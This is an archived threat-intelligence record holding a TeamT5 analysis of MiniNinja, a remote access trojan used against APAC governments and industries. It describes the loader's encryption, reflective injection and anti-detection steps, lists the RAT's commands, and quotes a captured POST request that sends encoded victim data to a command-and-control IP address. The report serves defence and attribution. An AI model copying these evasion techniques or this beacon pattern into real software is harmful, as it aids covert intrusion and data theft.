{
	"id": "2ff17fcf-7ffc-4e07-a856-20187c7f13c3",
	"created_at": "2026-04-06T00:06:14.726493Z",
	"updated_at": "2026-04-10T03:33:16.368628Z",
	"deleted_at": null,
	"sha1_hash": "3e98e6d2c76184ef28a5cb1b738c4386028a5702",
	"title": "Assassinations of \"MiniNinja\" in Various APAC Countries",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 435327,
	"plain_text": "Assassinations of \"MiniNinja\" in Various APAC Countries\r\nBy Cyber Threat Intelligence\r\nPublished: 2021-10-22 · Archived: 2026-04-05 16:17:55 UTC\r\nTeamT5 discovered a new remote administration tool (RAT), which we dubbed as MiniNinja, being used in\r\nseveral Chinese APT campaigns. TeamT5 has observed countries across different APAC regions, including\r\nTaiwan, Russia, Kyrgyzstan, Uzbekistan, Vietnam, the Philippines, and Pakistan, being targeted and attacked by\r\nthis malware. The impacted industries include governments, energy, IT, telecommunication and engineering.\r\nMiniNinja is a complex malware that uses several advanced techniques to prevent itself from being detected and\r\nanalyzed. Further, its wide targeting scope also attracted our attention. In this report, we will introduce the\r\ntechnical detail of our analysis.\r\nMiniNinja was first discovered in the wild in a targeted attack against Taiwanese government agencies in early\r\nMarch 2021. The actor leveraged the ProxyLogon vulnerability (CVE-2021-26855) to compromise an email\r\nserver and further implanted CobaltStrike Beacon and MiniNinja RAT in the victim network environment. This\r\ninformation was also disclosed in an ESET report[1] about a \"Websiic Campaign\" using the ProxyLogon\r\nvulnerability. TeamT5 noticed the existence of this new malware and started tracking its activities. Since then,\r\nTeamT5 has observed its footprints in Vietnam[2], Pakistan and the Philippines, possibly also implanted in victim\r\nhosts via the ProxyLogon vulnerability. Its latest activities were spear phishing email attacks against Russia and\r\nUzbekistan in September 2021. TeamT5 is still uncertain of the attribution of these attacks. However, we possess\r\nhigh confidence that this is a new tool used by Chinese APT based on its TTPs and C2 infrastructure.\r\nTo bypass antivirus detection, MiniNinja is encrypted as a binary blob in a binary payload file. 
It might have one or more loader components in native PE or .NET, but the loaders basically perform similar tasks. The loader components decrypt the blob and run it in memory via reflective DLL injection techniques. The loader first checks the first 4 bytes of the payload file and, if the header check passes, decrypts the content using the 3DES (112-bit) algorithm.\r\nhttps://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/\r\nPage 1 of 7\n\nThe decrypted buffer might be passed to a second-stage loader for further processing if there are multiple loader components. The loader then decodes the content with custom decoding methods and the LZSS decompression algorithm. The decoded payload is a PE file with its PE header erased; this is the MiniNinja RAT itself. Finally, the loader locates its export function \"Debug\" and starts execution from there.\r\nIn a payload collected from some Taiwanese victims, there is a PDB string left by the developer (only in memory), which is why we named this malware MiniNinja.\r\nThe decrypted malware configuration block contains the mutex string, C2 URL, HTTP header information, sleep time, etc.\r\nUpon execution, the following victim host information is collected:\r\nSystem info\r\nOS version\r\nHostname\r\nIP addr\r\nProcess name\r\nProcess ID\r\nThe above data is encoded with XOR encoding and a custom base64 encoding. 
Finally, the encoded result is sent to its C2 via POST:\r\nPOST http://149.28.28.159:443/Collector/3.0/ HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: 149.28.28.159:443\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko\r\nContent-Length: 474\r\nPragma: no-cache\r\nngluKGJ2JZ2[NKOs506NzsX9yVU7gkxWozQK5WmWoaUr9C0DN0iXb6lwFkcb2CE3HBk[4ISP3nI88jpLROJhQp8PvwLHU6LGYT4J4d4WOETXaWu8\r\nMiniNinja is a full-featured RAT that supports commands for file, process, memory, shell and account operations. Its supported functions are listed below in the Command Table.\r\nCommand Table\r\nSupported commands:\r\nCommand Description\r\n0x4E20 Heartbeat\r\n0x4E21 Init dwProcessId\r\n0x4E22 Change sleep time\r\n0x4E23 Exit (ExitProcess)\r\n0x4E24 CreateProcess\r\n0x4E25 TerminateThread\r\n0x4E26 Set close_socket to 0\r\n0x4E2A ShellCommand\r\n0x4E2B Get command result (calls WriteFile, PeekNamedPipe, ReadFile)\r\n0x4E2C TerminateProcess\r\n0x4E2D IterateProcess then TerminateProcess\r\n0x4E34 ~ 0x4E47 File Operations\r\n0x4E34 List disk drives\r\n0x4E35 ListDirectory\r\n0x4E36 CreateDirectory\r\n0x4E37 DeleteFile\r\n0x4E38 RemoveDirectory\r\n0x4E39 MoveFile\r\n0x4E3A CreateFile\r\n0x4E3E ReadFile\r\n0x4E3F WriteFile\r\n0x4E48 ~ 0x4E51 Socket Operations\r\n0x4E48 Connect Host\r\n0x4E49 Check socket status\r\n0x4E4A Send Data to Host\r\n0x4E4B Recv Data from Host\r\n0x4E4C Close socket\r\n0x4E4D Connect Host\r\nReserved? (0x4E4E-0x4E51) Null\r\n0x4E5C ~ 0x4E65 Memory Operations\r\n0x4E5C string copy\r\n0x4E5D string copy\r\n0x4E5E string copy\r\n*0x4E5F,0x4E60 Execute Plugin? 
(CreateProcess, process injection and CreateThread)\r\n*0x4E61,0x4E62 FileMapping (write data)\r\nReserved? (0x4E63,0x4E64) Null\r\n*0x4E65 Close file handle\r\n0x5208 List C2 configuration\r\n0x4E52 List Process\r\n0x4E53 IterateProcess, kill process\r\n0x4E54 Process Injection\r\n0x4E55 CreateThread for running DLL export function\r\n0x4E56 Read FileMap data (OpenFileMappingA -\u003e robject_, custom_base64)\r\n0x4E57 Exit DLL function? (robject_, UnmapViewOfFile)\r\n0x4E58 LookupAccountSid\r\nIoC\r\nReferences\r\nSource: https://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/"
	],
	"report_names": [
		"assassinations-of-minininja-in-various-apac-countries"
	],
	"threat_actors": [
		{
			"id": "60d96824-1767-4b97-a6c7-7e9527458007",
			"created_at": "2023-01-06T13:46:39.378701Z",
			"updated_at": "2026-04-10T02:00:03.307846Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"Websiic"
			],
			"source_name": "MISPGALAXY:ToddyCat",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775433974,
	"ts_updated_at": 1775791996,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3e98e6d2c76184ef28a5cb1b738c4386028a5702.pdf",
		"text": "https://archive.orkl.eu/3e98e6d2c76184ef28a5cb1b738c4386028a5702.txt",
		"img": "https://archive.orkl.eu/3e98e6d2c76184ef28a5cb1b738c4386028a5702.jpg"
	}
}